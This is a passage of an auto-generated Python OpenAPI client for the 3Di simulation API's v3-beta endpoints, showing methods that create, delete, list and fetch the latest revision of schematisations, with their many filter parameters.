ga.IndividualFactory.register(RastriginFloatIndividualFactory)
class RastriginBinaryIndividualFactory(ga.IndividualFactory):
def __init__(self, crossover_method='one_point', mutation_method='permutation'):
super(optimization.RastriginBinaryIndividualFactory, self).__init__()
self.crossover_method = crossover_method
if mutation_method == 'basic_mutation':
self.mutation_method = self.basic_mutation
else:
self.mutation_method = mutation_method
def create(self):
"""Creates individuals which [x,y] values are represented by 32 bits."""
genotype = map(binary, numpy.random.uniform(low=-5.0, high=5.0, size=2))
genotype = numpy.array(list("".join(genotype)), dtype=int)
fitness_evaluator = optimization.RastriginBinaryFitnessEvaluator()
return optimization.Individual(genotype, fitness_evaluator, self.crossover_method, self.mutation_method)
def basic_mutation(self_individual, individual):
"""Performs a basic mutation where one value in the chromosome is replaced by another valid value."""
idx = numpy.random.randint(0, len(individual.genotype))
value = numpy.random.randint(2)
numpy.put(individual.genotype, [idx], [value])
individual.fitness = individual.fitness_evaluator.evaluate(individual)
return individual
ga.IndividualFactory.register(RastriginBinaryIndividualFactory)
class XSquareFloatIndividualFactory(ga.IndividualFactory):
def __init__(self, crossover_method='one_point', mutation_method='permutation'):
super(optimization.XSquareFloatIndividualFactory, self).__init__()
self.crossover_method = crossover_method
if mutation_method == 'basic_mutation':
self.mutation_method = self.basic_mutation
else:
self.mutation_method = mutation_method
def create(self):
"""Creates individuals which [x1,x2,...,x30] values are uniformly distributed over -100.0 and 100.0."""
genotype = numpy.random.uniform(low=-100.0, high=100.0, size=30)
fitness_evaluator = optimization.XSquareFloatFitnessEvaluator()
return optimization.Individual(genotype, fitness_evaluator, self.crossover_method, self.mutation_method)
def basic_mutation(self_individual, individual):
"""Performs a basic mutation where one value in the chromosome is replaced by another valid value."""
idx = numpy.random.randint(0, len(individual.genotype))
value = numpy.random.uniform(low=-100.0, high=100.0)
numpy.put(individual.genotype, [idx], [value])
individual.fitness = individual.fitness_evaluator.evaluate(individual)
return individual
ga.IndividualFactory.register(XSquareFloatIndividualFactory)
class XSquareBinaryIndividualFactory(ga.IndividualFactory):
def __init__(self, crossover_method='one_point', mutation_method='permutation'):
super(optimization.XSquareBinaryIndividualFactory, self).__init__()
self.crossover_method = crossover_method
if mutation_method == 'basic_mutation':
self.mutation_method = self.basic_mutation
else:
self.mutation_method = mutation_method
def create(self):
"""Creates individuals which [x,y] values are represented by 32 bits."""
genotype = map(binary, numpy.random.uniform(low=-100.0, high=100.0, size=30))
genotype = numpy.array(list("".join(genotype)), dtype=int)
fitness_evaluator = optimization.XSquareBinaryFitnessEvaluator()
return optimization.Individual(genotype, fitness_evaluator, self.crossover_method, self.mutation_method)
def basic_mutation(self_individual, individual):
"""Performs a basic mutation where one value in the chromosome is replaced by another valid value."""
idx = numpy.random.randint(0, len(individual.genotype))
value = numpy.random.randint(2)
numpy.put(individual.genotype, [idx], [value])
individual.fitness = individual.fitness_evaluator.evaluate(individual)
return individual
ga.IndividualFactory.register(XSquareBinaryIndividualFactory)
class XAbsoluteSquareFloatIndividualFactory(ga.IndividualFactory):
def __init__(self, crossover_method='one_point', mutation_method='permutation'):
super(optimization.XAbsoluteSquareFloatIndividualFactory, self).__init__()
self.crossover_method = crossover_method
if mutation_method == 'basic_mutation':
self.mutation_method = self.basic_mutation
else:
self.mutation_method = mutation_method
def create(self):
"""Creates individuals which [x1,x2,...,x30] values are uniformly distributed over -100.0 and 100.0."""
genotype = numpy.random.uniform(low=-100.0, high=100.0, size=30)
fitness_evaluator = optimization.XAbsoluteSquareFloatFitnessEvaluator()
return optimization.Individual(genotype, fitness_evaluator, self.crossover_method, self.mutation_method)
def basic_mutation(self_individual, individual):
"""Performs a basic mutation where one value in the chromosome is replaced by another valid value."""
idx = numpy.random.randint(0, len(individual.genotype))
value = numpy.random.uniform(low=-100.0, high=100.0)
numpy.put(individual.genotype, [idx], [value])
individual.fitness = individual.fitness_evaluator.evaluate(individual)
return individual
ga.IndividualFactory.register(XAbsoluteSquareFloatIndividualFactory)
class XAbsoluteSquareBinaryIndividualFactory(ga.IndividualFactory):
def __init__(self, crossover_method='one_point', mutation_method='permutation'):
super(optimization.XAbsoluteSquareBinaryIndividualFactory, self).__init__()
self.crossover_method = crossover_method
if mutation_method == 'basic_mutation':
self.mutation_method = self.basic_mutation
else:
self.mutation_method = mutation_method
def create(self):
"""Creates individuals which [x,y] values are represented by 32 bits."""
genotype = map(binary, numpy.random.uniform(low=-100.0, high=100.0, size=30))
genotype = numpy.array(list("".join(genotype)), dtype=int)
fitness_evaluator = optimization.XAbsoluteSquareBinaryFitnessEvaluator()
return optimization.Individual(genotype, fitness_evaluator, self.crossover_method, self.mutation_method)
def basic_mutation(self_individual, individual):
"""Performs a basic mutation where one value in the chromosome is replaced by another valid value."""
idx = numpy.random.randint(0, len(individual.genotype))
value = numpy.random.randint(2)
numpy.put(individual.genotype, [idx], [value])
individual.fitness = individual.fitness_evaluator.evaluate(individual)
return individual
ga.IndividualFactory.register(XAbsoluteSquareBinaryIndividualFactory)
class SineXSquareRootFloatIndividualFactory(ga.IndividualFactory):
def __init__(self, crossover_method='one_point', mutation_method='permutation'):
super(optimization.SineXSquareRootFloatIndividualFactory, self).__init__()
self.crossover_method = crossover_method
if mutation_method == 'basic_mutation':
self.mutation_method = self.basic_mutation
else:
self.mutation_method = mutation_method
def create(self):
"""Creates individuals which [x1,x2,...,x30] values are uniformly distributed over -500.0 and 500.0."""
genotype = numpy.random.uniform(low=-500.0, high=500.0, size=30)
fitness_evaluator = optimization.SineXSquareRootFloatFitnessEvaluator()
return optimization.Individual(genotype, fitness_evaluator, self.crossover_method, self.mutation_method)
def basic_mutation(self_individual, individual):
"""Performs a basic mutation where one value in the chromosome is replaced by another valid value."""
idx = numpy.random.randint(0, len(individual.genotype))
value = numpy.random.uniform(low=-500.0, high=500.0)
numpy.put(individual.genotype, [idx], [value])
individual.fitness = individual.fitness_evaluator.evaluate(individual)
return individual
ga.IndividualFactory.register(SineXSquareRootFloatIndividualFactory)
class SineXSquareRootBinaryIndividualFactory(ga.IndividualFactory):
def __init__(self, crossover_method='one_point', mutation_method='permutation'):
super(optimization.SineXSquareRootBinaryIndividualFactory, self).__init__()
self.crossover_method = crossover_method
if mutation_method == 'basic_mutation':
self.mutation_method = self.basic_mutation
else:
self.mutation_method = mutation_method
def create(self):
"""Creates individuals which [x,y] values are represented by 32 bits."""
genotype = map(binary, numpy.random.uniform(low=-500.0, high=500.0, size=30))
genotype = numpy.array(list("".join(genotype)), dtype=int)
fitness_evaluator = optimization.SineXSquareRootBinaryFitnessEvaluator()
return optimization.Individual(genotype, fitness_evaluator, self.crossover_method, self.mutation_method)
def basic_mutation(self_individual, individual):
"""Performs a basic mutation where one value in the chromosome is replaced by another valid value."""
idx = numpy.random.randint(0, len(individual.genotype))
value = numpy.random.randint(2)
numpy.put(individual.genotype, [idx], [value])
individual.fitness = individual.fitness_evaluator.evaluate(individual)
return individual
ga.IndividualFactory.register(SineXSquareRootBinaryIndividualFactory)
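For reference, a hedged sketch of inverting the 32-bit encoding produced by binary(); from_binary is a hypothetical helper, not part of the module:
import struct

def from_binary(bits):
    # Regroup the 32-character bit string into 4 bytes and unpack a big-endian float.
    return struct.unpack('!f', bytes(int(bits[i:i + 8], 2) for i in range(0, 32, 8)))[0]

assert abs(from_binary(binary(3.14)) - 3.14) < 1e-6  # float32 round-trip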
| 51.614679
| 112
| 0.721738
| 1,213
| 11,252
| 6.523495
| 0.093157
| 0.084924
| 0.057627
| 0.046506
| 0.834702
| 0.831669
| 0.825856
| 0.825856
| 0.825856
| 0.823581
| 0
| 0.017643
| 0.178902
| 11,252
| 218
| 113
| 51.614679
| 0.838835
| 0.127622
| 0
| 0.732919
| 0
| 0
| 0.028657
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15528
| false
| 0
| 0.012422
| 0.006211
| 0.322981
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f10e1d5aebeb460fb695a42cd276e7ea5488b448
| 92
|
py
|
Python
|
tabular/src/autogluon/tabular/utils/features/__init__.py
|
mseeger/autogluon-1
|
e8d82363ce07fd8e3087bcdd2d71c6f6bd8fd7a0
|
[
"Apache-2.0"
] | null | null | null |
tabular/src/autogluon/tabular/utils/features/__init__.py
|
mseeger/autogluon-1
|
e8d82363ce07fd8e3087bcdd2d71c6f6bd8fd7a0
|
[
"Apache-2.0"
] | null | null | null |
tabular/src/autogluon/tabular/utils/features/__init__.py
|
mseeger/autogluon-1
|
e8d82363ce07fd8e3087bcdd2d71c6f6bd8fd7a0
|
[
"Apache-2.0"
] | null | null | null |
from ...utils.features.feature_metadata import *
from ...utils.features.generators import *
| 30.666667
| 48
| 0.782609
| 11
| 92
| 6.454545
| 0.636364
| 0.253521
| 0.478873
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 92
| 2
| 49
| 46
| 0.845238
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f111109b53da4d95961dd04d64753c05cb7f332c
| 1,569
|
py
|
Python
|
break.py
|
Manthanc007/APS-2o2o
|
a84337c4e658a93b6c67515fa3ef59b09f2e5e94
|
[
"MIT"
] | null | null | null |
break.py
|
Manthanc007/APS-2o2o
|
a84337c4e658a93b6c67515fa3ef59b09f2e5e94
|
[
"MIT"
] | null | null | null |
break.py
|
Manthanc007/APS-2o2o
|
a84337c4e658a93b6c67515fa3ef59b09f2e5e94
|
[
"MIT"
] | null | null | null |
from sys import stdin, stdout
t,s=map(int,input().split())
if(s==1):
while(t>0):
t=t-1
n=int(stdin.readline())
a=[int(x) for x in stdin.readline().split()]
b=[int(x) for x in stdin.readline().split()]
a.sort()
b.sort()
l=set()
l.add(a[0])
count=0
for i in range(0,n):
if(a[i]<b[i] and count==0 and (a[i] in l)):
l.add(a[i])
l.add(b[i])
count=0
else:
count=1
break
if(count==0):
stdout.write("YES"+'\n')
else:
stdout.write("NO"+'\n')
if(s==2):
while(t>0):
t=t-1
n=int(stdin.readline())
a=[int(x) for x in stdin.readline().split()]
b=[int(x) for x in stdin.readline().split()]
a.sort()
b.sort()
l=set()
l.add(a[0])
count=0
for i in range(0,n):
if(a[i]<b[i] and count==0 and (a[i] in l)):
l.add(a[i])
l.add(b[i])
count=0
else:
# while(
if(a[i]>=b[i]):
#Defender gives up
b=b+a[0:i+1]
a=a[i+1:]
else:
#attacker gives up
count=1
                    a=a[i:]
break
if(count==0):
stdout.write("YES"+'\n')
        else:
            stdout.write("NO"+'\n')
| 27.051724
| 56
| 0.341619
| 209
| 1,569
| 2.564593
| 0.191388
| 0.033582
| 0.052239
| 0.059701
| 0.761194
| 0.75
| 0.75
| 0.75
| 0.75
| 0.630597
| 0
| 0.029337
| 0.500319
| 1,569
| 57
| 57
| 27.526316
| 0.654337
| 0
| 0
| 0.826923
| 0
| 0
| 0.009576
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.019231
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f15eaefccd54f4b03e848081ce89a86147403875
| 316,691
|
py
|
Python
|
threedi_api_client/openapi/api/v3_beta_api.py
|
nens/threedi-api-client
|
43b0eb1bd47310b1783f87f6ad8bfbfe0fb4d90a
|
[
"BSD-3-Clause"
] | null | null | null |
threedi_api_client/openapi/api/v3_beta_api.py
|
nens/threedi-api-client
|
43b0eb1bd47310b1783f87f6ad8bfbfe0fb4d90a
|
[
"BSD-3-Clause"
] | 16
|
2021-05-31T09:52:04.000Z
|
2022-03-14T16:07:19.000Z
|
threedi_api_client/openapi/api/v3_beta_api.py
|
nens/threedi-api-client
|
43b0eb1bd47310b1783f87f6ad8bfbfe0fb4d90a
|
[
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
"""
3Di API
3Di simulation API (latest stable version: v3) Framework release: 2.9.0 3Di core release: 2.2.2 deployed on: 11:01AM (UTC) on January 11, 2022 # noqa: E501
The version of the OpenAPI document: v3
Contact: info@nelen-schuurmans.nl
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from threedi_api_client.openapi.api_client import ApiClient
from threedi_api_client.openapi.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class V3BetaApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def schematisations_create(self, data, **kwargs): # noqa: E501
"""schematisations_create # noqa: E501
Manage schematisations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_create(data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param Schematisation data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Schematisation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_create_with_http_info(data, **kwargs) # noqa: E501
def schematisations_create_with_http_info(self, data, **kwargs): # noqa: E501
"""schematisations_create # noqa: E501
Manage schematisations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_create_with_http_info(data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param Schematisation data: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Schematisation, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_create" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_create`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Schematisation', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_delete(self, id, **kwargs): # noqa: E501
"""schematisations_delete # noqa: E501
        Schematisation can only be deleted when all committed revisions are deleted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_delete(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this schematisation. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_delete_with_http_info(id, **kwargs) # noqa: E501
def schematisations_delete_with_http_info(self, id, **kwargs): # noqa: E501
"""schematisations_delete # noqa: E501
        Schematisation can only be deleted when all committed revisions are deleted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_delete_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this schematisation. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{id}/', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_latest_revision(self, id, **kwargs): # noqa: E501
"""Get the latest committed revision. # noqa: E501
For retrieving all revisions use: `/schematisations/{id}/revisions` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_latest_revision(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this schematisation. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: SchematisationRevision
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_latest_revision_with_http_info(id, **kwargs) # noqa: E501
def schematisations_latest_revision_with_http_info(self, id, **kwargs): # noqa: E501
"""Get the latest committed revision. # noqa: E501
For retrieving all revisions use: `/schematisations/{id}/revisions` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_latest_revision_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this schematisation. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(SchematisationRevision, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_latest_revision" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_latest_revision`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{id}/latest_revision/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SchematisationRevision', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
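# Usage sketch (illustrative, with a hypothetical schematisation id):
#
#     revision = api.schematisations_latest_revision(id=123)
#     # `revision` is a SchematisationRevision model instance; only committed
#     # revisions are considered, per the docstring above.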
def schematisations_list(self, **kwargs): # noqa: E501
"""schematisations_list # noqa: E501
Manage schematisations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str created__range: Multiple values may be separated by commas.
:param str created__date:
:param str created__date__gt:
:param str created__date__gte:
:param str created__date__lt:
:param str created__date__lte:
:param float created__year:
:param float created__year__gt:
:param float created__year__gte:
:param float created__year__lt:
:param float created__year__lte:
:param float created__month:
:param float created__month__lte:
:param float created__day:
:param float created__day__lt:
:param float created__week:
:param float created__week_day:
:param float created__quarter:
:param str created__time:
:param float created__hour:
:param float created__minute:
:param float created__second:
:param str created__isnull:
:param str last_updated__range: Multiple values may be separated by commas.
:param str last_updated__date:
:param str last_updated__date__gt:
:param str last_updated__date__gte:
:param str last_updated__date__lt:
:param str last_updated__date__lte:
:param float last_updated__year:
:param float last_updated__year__gt:
:param float last_updated__year__gte:
:param float last_updated__year__lt:
:param float last_updated__year__lte:
:param float last_updated__month:
:param float last_updated__month__lte:
:param float last_updated__day:
:param float last_updated__day__lt:
:param float last_updated__week:
:param float last_updated__week_day:
:param float last_updated__quarter:
:param str last_updated__time:
:param float last_updated__hour:
:param float last_updated__minute:
:param float last_updated__second:
:param str last_updated__isnull:
:param str created_by__username:
:param str created_by__username__iexact:
:param str created_by__username__contains:
:param str created_by__username__icontains:
:param str created_by__username__in: Multiple values may be separated by commas.
:param str created_by__username__startswith:
:param str created_by__username__istartswith:
:param str created_by__username__endswith:
:param str created_by__username__regex:
:param str name:
:param str name__iexact:
:param str name__contains:
:param str name__icontains:
:param str name__in: Multiple values may be separated by commas.
:param str name__startswith:
:param str name__istartswith:
:param str name__endswith:
:param str name__regex:
:param str slug:
:param str slug__iexact:
:param str slug__contains:
:param str slug__icontains:
:param str slug__in: Multiple values may be separated by commas.
:param str slug__startswith:
:param str slug__istartswith:
:param str slug__endswith:
:param str slug__regex:
:param str owner__name:
:param str owner__name__iexact:
:param str owner__name__contains:
:param str owner__name__icontains:
:param str owner__name__in: Multiple values may be separated by commas.
:param str owner__name__startswith:
:param str owner__name__istartswith:
:param str owner__name__endswith:
:param str owner__name__regex:
:param str owner__unique_id:
:param str owner__unique_id__iexact:
:param str owner__unique_id__contains:
:param str owner__unique_id__icontains:
:param str owner__unique_id__in: Multiple values may be separated by commas.
:param str owner__unique_id__startswith:
:param str owner__unique_id__istartswith:
:param str owner__unique_id__endswith:
:param str owner__unique_id__regex:
:param str tags__in:
:param str ordering: Which field to use when ordering the results.
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_list_with_http_info(**kwargs) # noqa: E501
def schematisations_list_with_http_info(self, **kwargs): # noqa: E501
"""schematisations_list # noqa: E501
Manage schematisations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str created__range: Multiple values may be separated by commas.
:param str created__date:
:param str created__date__gt:
:param str created__date__gte:
:param str created__date__lt:
:param str created__date__lte:
:param float created__year:
:param float created__year__gt:
:param float created__year__gte:
:param float created__year__lt:
:param float created__year__lte:
:param float created__month:
:param float created__month__lte:
:param float created__day:
:param float created__day__lt:
:param float created__week:
:param float created__week_day:
:param float created__quarter:
:param str created__time:
:param float created__hour:
:param float created__minute:
:param float created__second:
:param str created__isnull:
:param str last_updated__range: Multiple values may be separated by commas.
:param str last_updated__date:
:param str last_updated__date__gt:
:param str last_updated__date__gte:
:param str last_updated__date__lt:
:param str last_updated__date__lte:
:param float last_updated__year:
:param float last_updated__year__gt:
:param float last_updated__year__gte:
:param float last_updated__year__lt:
:param float last_updated__year__lte:
:param float last_updated__month:
:param float last_updated__month__lte:
:param float last_updated__day:
:param float last_updated__day__lt:
:param float last_updated__week:
:param float last_updated__week_day:
:param float last_updated__quarter:
:param str last_updated__time:
:param float last_updated__hour:
:param float last_updated__minute:
:param float last_updated__second:
:param str last_updated__isnull:
:param str created_by__username:
:param str created_by__username__iexact:
:param str created_by__username__contains:
:param str created_by__username__icontains:
:param str created_by__username__in: Multiple values may be separated by commas.
:param str created_by__username__startswith:
:param str created_by__username__istartswith:
:param str created_by__username__endswith:
:param str created_by__username__regex:
:param str name:
:param str name__iexact:
:param str name__contains:
:param str name__icontains:
:param str name__in: Multiple values may be separated by commas.
:param str name__startswith:
:param str name__istartswith:
:param str name__endswith:
:param str name__regex:
:param str slug:
:param str slug__iexact:
:param str slug__contains:
:param str slug__icontains:
:param str slug__in: Multiple values may be separated by commas.
:param str slug__startswith:
:param str slug__istartswith:
:param str slug__endswith:
:param str slug__regex:
:param str owner__name:
:param str owner__name__iexact:
:param str owner__name__contains:
:param str owner__name__icontains:
:param str owner__name__in: Multiple values may be separated by commas.
:param str owner__name__startswith:
:param str owner__name__istartswith:
:param str owner__name__endswith:
:param str owner__name__regex:
:param str owner__unique_id:
:param str owner__unique_id__iexact:
:param str owner__unique_id__contains:
:param str owner__unique_id__icontains:
:param str owner__unique_id__in: Multiple values may be separated by commas.
:param str owner__unique_id__startswith:
:param str owner__unique_id__istartswith:
:param str owner__unique_id__endswith:
:param str owner__unique_id__regex:
:param str tags__in:
:param str ordering: Which field to use when ordering the results.
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse200, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'created__range',
'created__date',
'created__date__gt',
'created__date__gte',
'created__date__lt',
'created__date__lte',
'created__year',
'created__year__gt',
'created__year__gte',
'created__year__lt',
'created__year__lte',
'created__month',
'created__month__lte',
'created__day',
'created__day__lt',
'created__week',
'created__week_day',
'created__quarter',
'created__time',
'created__hour',
'created__minute',
'created__second',
'created__isnull',
'last_updated__range',
'last_updated__date',
'last_updated__date__gt',
'last_updated__date__gte',
'last_updated__date__lt',
'last_updated__date__lte',
'last_updated__year',
'last_updated__year__gt',
'last_updated__year__gte',
'last_updated__year__lt',
'last_updated__year__lte',
'last_updated__month',
'last_updated__month__lte',
'last_updated__day',
'last_updated__day__lt',
'last_updated__week',
'last_updated__week_day',
'last_updated__quarter',
'last_updated__time',
'last_updated__hour',
'last_updated__minute',
'last_updated__second',
'last_updated__isnull',
'created_by__username',
'created_by__username__iexact',
'created_by__username__contains',
'created_by__username__icontains',
'created_by__username__in',
'created_by__username__startswith',
'created_by__username__istartswith',
'created_by__username__endswith',
'created_by__username__regex',
'name',
'name__iexact',
'name__contains',
'name__icontains',
'name__in',
'name__startswith',
'name__istartswith',
'name__endswith',
'name__regex',
'slug',
'slug__iexact',
'slug__contains',
'slug__icontains',
'slug__in',
'slug__startswith',
'slug__istartswith',
'slug__endswith',
'slug__regex',
'owner__name',
'owner__name__iexact',
'owner__name__contains',
'owner__name__icontains',
'owner__name__in',
